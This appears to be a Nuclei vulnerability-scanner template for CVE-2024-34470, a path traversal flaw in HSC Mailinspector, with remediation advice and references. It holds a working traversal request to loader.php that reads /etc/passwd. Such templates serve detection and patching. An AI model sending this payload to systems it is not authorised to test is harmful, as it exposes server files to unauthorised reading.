id: CVE-2024-34470

info:
  name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
  author: topscoder
  severity: high
  description: |
    An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
  impact: |
    Unauthenticated attackers can exploit path traversal to read arbitrary files from the server.
  remediation: |
    Update HSC Mailinspector to a version later than 5.2.18 that patches the path traversal vulnerability.
  reference:
    - https://github.com/osvaldotenorio/CVE-2024-34470
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-34470
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
    epss-score: 0.06699
    epss-percentile: 0.93078
  metadata:
    verified: true
    max-request: 2
    fofa-query: "mailinspector/public"
  tags: cve,cve2024,lfi,mailinspector,hsc,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/login.php"

    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "Licensed to HSC TREINAMENTO"

  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100facbc189508b851a46ce6cfbeadf1964a472377b6d7f66cad263db2eb2d89791022100fb744e0effe38b78cd21e61407ceda23717ded5579835faff9277e34c2b4a43f:922c64590222798bb761d5b6d8e72950